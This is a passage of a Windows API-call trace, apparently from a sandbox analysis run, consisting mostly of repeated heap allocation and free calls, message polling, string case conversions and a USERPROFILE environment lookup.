hHeap=0x25c0000) returned 1 [0264.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0264.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0264.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0264.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0264.054] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0264.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0264.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0264.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0264.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0264.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0264.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0264.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0264.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0264.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0264.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0264.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0264.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0264.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0264.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0264.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0264.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0264.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0264.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0264.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0264.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0264.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0264.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0264.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0264.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0264.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0264.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0264.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0264.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0264.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0264.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0264.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0264.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0264.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0264.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0264.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0264.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0264.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0264.057] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.057] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0264.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0264.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0264.058] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0264.058] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0264.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0264.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0264.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0264.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0264.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0264.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0264.058] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0264.059] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.059] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0264.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0264.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0264.059] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0264.059] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0264.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0264.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0264.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0264.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0264.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0264.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0264.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0264.060] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0264.060] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0264.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0264.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0264.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0264.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0264.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0264.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0264.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0264.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0264.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0264.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0264.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0264.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0264.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0264.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0264.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0264.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0264.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0264.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0264.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0264.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0264.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0264.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0264.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0264.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0264.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0264.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0264.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0264.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0264.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0264.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0264.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0264.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0264.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0264.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0264.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0264.064] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.064] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.064] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0264.064] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0264.064] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0264.064] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0264.064] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0264.064] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.064] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.064] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.064] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.065] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.065] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.065] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0264.065] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.065] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0264.065] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.065] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.065] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.065] CryptReleaseContext (hProv=0xad2be8, dwFlags=0x0) returned 1 [0264.065] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.065] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.066] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.066] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.066] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.066] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.066] FreeLibrary (hLibModule=0x74d40000) returned 1 [0264.066] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.066] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.066] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0264.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0264.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0264.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0264.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0264.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0264.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0264.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0264.069] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0264.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0264.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0264.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0264.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0264.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0264.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0264.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0264.070] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0264.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0264.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0264.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0264.071] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0264.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0264.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0264.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0264.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0264.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0264.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0264.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0264.072] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0264.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0264.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0264.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0264.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0264.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0264.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0264.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0264.072] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0264.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0264.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0264.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0264.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0264.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0264.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0264.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0264.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0264.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0264.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0264.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0264.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0264.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: 